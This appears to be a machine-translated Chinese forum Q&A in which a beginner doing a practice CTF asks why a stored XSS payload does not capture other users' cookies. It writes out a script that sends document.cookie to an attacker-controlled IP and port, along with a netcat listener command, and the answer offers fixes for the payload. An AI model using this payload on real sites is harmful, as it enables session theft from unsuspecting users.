javascript - 使用存储型 XSS 窃取用户 cookie
问题描述
我是计算领域的新手,我目前正在其中一个易受攻击的网站上做一些练习 CTF 挑战,并发现了一个 XSS 漏洞。我知道我可以使用存储的 XSS 来窃取用户 cookie,但我不知道为什么我的代码不起作用,例如为什么当另一个用户进入易受攻击的页面时,他们的 cookie 没有被记录在我的端。
我在文本框中输入了这个 XSS 注入<script> document.write('<img src="http://l92.168.48.6:6790?cookie ='+ escape(document.cookie) + '" />);</script>
但是然后,在 linux 终端中我输入nc -l -p 6790
并且我没有收到任何 cookie。就像我这样做<script>alert(document.cookie)</script>
时会显示我的 cookie - 但我的意图是窃取下一个用户的 cookie,即当用户访问该页面时。
我相信这对你们来说是微不足道的,但请帮助一个菜鸟。我是网络安全的新手,并且正在自学。
解决方案
尝试用 encodeURIComponent 方法替换 escape 方法
你实际上得到了什么?您是否检查了浏览器上的网络控制台?知道请求是否发送?
推荐阅读
- php - 为了处理表单数据*通过 ajax*,我需要添加到 PHP 文件中的哪些调整
- angular - 将 Primeng 升级到版本 9 后页面不呈现
- flutter - 从 firestore 获取数据时添加加载屏幕以颤振
- javascript - 滑动切换的正确方法,然后动态创建内容和滑动切换
- javascript - 如何从嵌套的对象数组中删除对象属性?
- postgresql - 如何简化此 UNION 查询(删除 UNION)?
- angular - Angular HTTP 获取请求在 ngOnInit 中不起作用
- r - 按行绑定具有不同列名的数据框
- visual-studio-code - 如何隐藏 VS Code 中打开的文件选项卡右侧的按钮?
- google-cloud-platform - Google Cloud Speech 可以同时处理来自同一个客户端的多个请求吗?